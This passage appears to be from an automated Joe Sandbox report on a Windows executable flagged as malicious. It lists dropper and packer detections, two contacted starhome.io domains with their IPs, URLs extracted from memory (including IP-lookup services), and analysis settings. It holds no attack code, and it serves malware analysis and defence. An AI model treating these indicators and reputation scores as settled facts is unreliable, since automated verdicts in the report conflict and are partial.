          18.0.WingFtpServer.tmp.400000.0.unpack100%AviraTR/Dropper.GenDownload File
          7.0.vbc.exe.43a0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          register.starhome.io0%VirustotalBrowse
          files.starhome.io0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://www.wftpserver.com/6https://www.wftpserver.com/6https://www.wftpserver.com/0%Avira URL Cloudsafe
          https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object0%URL Reputationsafe
          https://files.starhome.io/downloads/winapp/latest-ia32.json20%Avira URL Cloudsafe
          http://tnx.nl/ip0%Avira URL Cloudsafe
          http://ifconfig.co/ip0%VirustotalBrowse
          http://crl.dhimyotis.com/certignarootca.crl0%URL Reputationsafe
          http://www.innosetup.com/0%URL Reputationsafe
          http://www.innosetup.com/0%URL Reputationsafe
          https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
          http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
          https://dynamic.t0%URL Reputationsafe
          https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot0%URL Reputationsafe
          http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0%URL Reputationsafe
          http://tnx.nl/ip1%VirustotalBrowse
          http://www.accv.es000%URL Reputationsafe
          https://sourcemaps.info/spec.html0%URL Reputationsafe
          https://files.starhome.io/downloads/winapp/latest-0%Avira URL Cloudsafe
          http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
          https://heycam.github.io/webidl/#dfn-default-iterator-object0%URL Reputationsafe
          https://heycam.github.io/webidl/#es-iterable-entries0%URL Reputationsafe
          https://heycam.github.io/webidl/#es-interfaces0%URL Reputationsafe
          https://tc39.github.io/ecma262/#sec-object.prototype.tostring0%URL Reputationsafe
          https://heycam.github.io/webidl/#dfn-class-string0%URL Reputationsafe
          https://heycam.github.io/webidl/#dfn-iterator-prototype-object0%URL Reputationsafe
          http://ifconfig.co/ip0%Avira URL Cloudsafe
          http://ocsp.accv.es00%URL Reputationsafe
          http://tnx.nl/ip90%Avira URL Cloudsafe
          http://crl.ver)0%Avira URL Cloudsafe
          http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlp0%Avira URL Cloudsafe
          http://narwhaljs.org)0%Avira URL Cloudsafe
          https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
          http://ocsp.accv.es60%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          register.starhome.io
          		142.93.96.73
          		truefalseunknown
          files.starhome.io
          		188.114.96.3
          		truefalseunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://url.spec.whatwg.org/#concept-url-originnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
            		high
            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000009.00000003.310607336.000001D5F9659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311451621.000001D5F965A000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://www.wftpserver.com/6https://www.wftpserver.com/6https://www.wftpserver.com/WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000003.346283187.0000000003A50000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://gist.github.com/XVilka/8346728#gistcomment-2823421node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                		high
                https://github.com/nodejs/node-v0.x-archive/issues/2876.node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                  		high
                  http://ispp.sourceforge.net/AcercaWingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://files.starhome.io/downloads/winapp/latest-ia32.json2node.exe, 00000022.00000003.488902440.0000000003480000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecma-international.org/ecma-262/#sec-timeclipnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                      		high
                      https://console.spec.whatwg.org/#tablenode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                        		high
                        https://www.iana.org/assignments/tls-extensiontype-valuesnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                          		high
                          https://console.spec.whatwg.org/#console-namespacenode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                            		high
                            https://url.spec.whatwg.org/#urlnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                              		high
                              https://encoding.spec.whatwg.org/#textencodernode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                		high
                                http://ifconfig.co/ipnode.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://github.com/nodejs/node/issues/13435node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                  		high
                                  https://goo.gl/t5IS6M).node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                    		high
                                    https://tools.ietf.org/html/rfc7230#section-3.2.2node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                      		high
                                      http://repository.swisssign.com/inode.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                          		high
                                          http://tnx.nl/ipnode.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • 1%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://tc39.github.io/ecma262/#sec-%iteratorprototype%-objectnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://files.starhome.io/downloads/winapp/latest-node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://url.spec.whatwg.org/#concept-urlencoded-serializernode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                            		high
                                            http://crl.dhimyotis.com/certignarootca.crlnode.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://nodejs.org/download/release/v12.22.12/win-x86/node.libnode.exe, 00000022.00000002.620060167.000000001CA40000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.612343687.0000000002217000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3Fnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                		high
                                                http://ip-api.com/line/?fields=querynode.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.cert.fnmt.es/dpcs/(fnode.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nodejs.org/api/fs.htmlnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                      		high
                                                      https://github.com/chalk/ansi-regex/blob/master/index.jsnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                        		high
                                                        http://www.innosetup.com/WingFtpServer.exe, 0000000E.00000003.314208758.000000007F6C0000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000000.327122347.0000000000401000.00000020.00000001.01000000.00000008.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://github.com/nodejs/node/pull/21313node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                          		high
                                                          http://www.midnight-commander.org/browser/lib/tty/key.cnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                            		high
                                                            https://nodejs.org/node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                              		high
                                                              https://tools.ietf.org/html/rfc7540#section-8.1.2.5node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                		high
                                                                https://wwww.certigna.fr/autorites/0mnode.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.squid-cache.org/Doc/config/half_closed_clients/node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                  		high
                                                                  https://stackoverflow.com/a/5501711/3561node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                    		high
                                                                    http://crl.ver)svchost.exe, 00000031.00000002.544706692.0000015A138E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		low
                                                                    http://tnx.nl/ip9node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://narwhaljs.org)node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		low
                                                                      https://www.ecma-international.org/ecma-262/#sec-promise.allnode.exe, 00000022.00000002.623548071.000000003ACC0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.604744457.0000000001801000.00000040.00000001.01000000.0000000E.sdmp, node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                        		high
                                                                        https://code.google.com/p/chromium/issues/detail?id=25916node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                          		high
                                                                          http://crl.securetrust.com/STCA.crlnode.exe, 00000022.00000002.614186818.0000000003317000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://dynamic.tsvchost.exe, 00000009.00000002.311417918.000001D5F964E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311380844.000001D5F9642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.cert.fnmt.es/dpcs/node.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://nodejs.org/download/release/v12.22.12/node-v12.22.12-headers.tar.gznode.exe, 00000022.00000002.620060167.000000001CA40000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.612343687.0000000002217000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://github.com/nodejs/node/pull/12607node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                    		high
                                                                                    https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slotnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlnode.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.accv.es00node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://ispp.sourceforge.net/WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.555929864.00000000009CC000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556447653.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.ecma-international.org/ecma-262/#sec-line-terminatorsnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                        		high
                                                                                        https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                          		high
                                                                                          https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000009.00000003.310607336.000001D5F9659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311451621.000001D5F965A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000009.00000003.310479327.000001D5F965E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://sourcemaps.info/spec.htmlnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://ispp.sourceforge.net/InformazioniWingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000009.00000003.310462310.000001D5F9661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://invisible-island.net/xterm/ctlseqs/ctlseqs.htmlnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                    		high
                                                                                                    https://github.com/nodejs/node/pull/12342node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                      		high
                                                                                                      https://bugs.chromium.org/p/v8/issues/detail?id=6593node.exe, 00000022.00000002.623548071.000000003ACC0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.604744457.0000000001801000.00000040.00000001.01000000.0000000E.sdmp, node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                        		high
                                                                                                        https://github.com/v8/v8/blob/d6ead37d265d7215cf9c5f768f279e21bd170212/src/js/prologue.js#L152-L156node.exe, 00000022.00000002.623548071.000000003ACC0000.00000004.00001000.00020000.00000000.sdmp, node.exe, 00000022.00000002.604744457.0000000001801000.00000040.00000001.01000000.0000000E.sdmp, node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.firmaprofesional.com/cps0node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://ipinfo.io/ip9node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://github.com/nodejs/node/pull/34375node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                		high
                                                                                                                http://icanhazip.com/node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://crl.securetrust.com/SGCA.crl0node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://heycam.github.io/webidl/#dfn-default-iterator-objectnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://heycam.github.io/webidl/#es-iterable-entriesnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://heycam.github.io/webidl/#es-interfacesnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000009.00000003.288603794.000001D5F9632000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaquenode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-colornode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://github.com/nodejs/node/issuesnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.quovadisglobal.com/cps0node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://tc39.github.io/ecma262/#sec-object.prototype.tostringnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://url.spec.whatwg.org/#urlsearchparamsnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://github.com/chalk/supports-colornode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://github.com/nodejs/node/pull/30380#issuecomment-552948364node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setintervalnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://heycam.github.io/webidl/#dfn-class-stringnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://heycam.github.io/webidl/#dfn-iterator-prototype-objectnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://ipinfo.io/ip(node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000002.311375207.000001D5F963D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://ocsp.accv.es6node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlpnode.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://github.com/nodejs/node/issues/10673node.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://ocsp.accv.es0node.exe, 00000022.00000003.533511000.0000000003558000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.616322384.0000000003558000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://ispp.sourceforge.net/OverWingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310660287.000001D5F9645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://github.com/mafintosh/pumpnode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310607336.000001D5F9659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311451621.000001D5F965A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000031.00000003.516815673.0000015A141AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.517655128.0000015A14196000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.518006368.0000015A14602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.517149780.0000015A141AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.517385479.0000015A14185000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://url.spec.whatwg.org/#concept-urlencoded-parsernode.exe, 00000022.00000002.582846721.0000000000E01000.00000040.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000009.00000003.310649707.000001D5F9647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.310620113.000001D5F9640000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.311417918.000001D5F964E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high

                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public IPs

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        188.114.96.3
                                                                                                                                                        		files.starhome.ioEuropean Union
                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                        142.93.96.73
                                                                                                                                                        		register.starhome.ioUnited States
                                                                                                                                                        		14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                                        Private

                                                                                                                                                        IP
                                                                                                                                                        192.168.2.1

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                        Analysis ID:701216
                                                                                                                                                        Start date and time:2022-09-12 10:16:34 +02:00
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 12m 18s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Sample file name:z5i6tLOUD0.exe
                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Number of analysed new started processes analysed:59
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal60.troj.evad.winEXE@75/22@2/3
                                                                                                                                                        EGA Information:
                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                        HDC Information:
                                                                                                                                                        • Successful, ratio: 99.8% (good quality ratio 98.1%)
                                                                                                                                                        • Quality average: 82.3%
                                                                                                                                                        • Quality standard deviation: 23.8%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 98%
                                                                                                                                                        • Number of executed functions: 94
                                                                                                                                                        • Number of non-executed functions: 62
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI

                                                                                                                                                        Warnings

                                                                                                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.82.154.241, 20.82.228.9
                                                                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, neus1c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, ris.api.iris.microsoft.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, neus2c-displaycatalog.frontdoor.bigcatalog.commerce.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
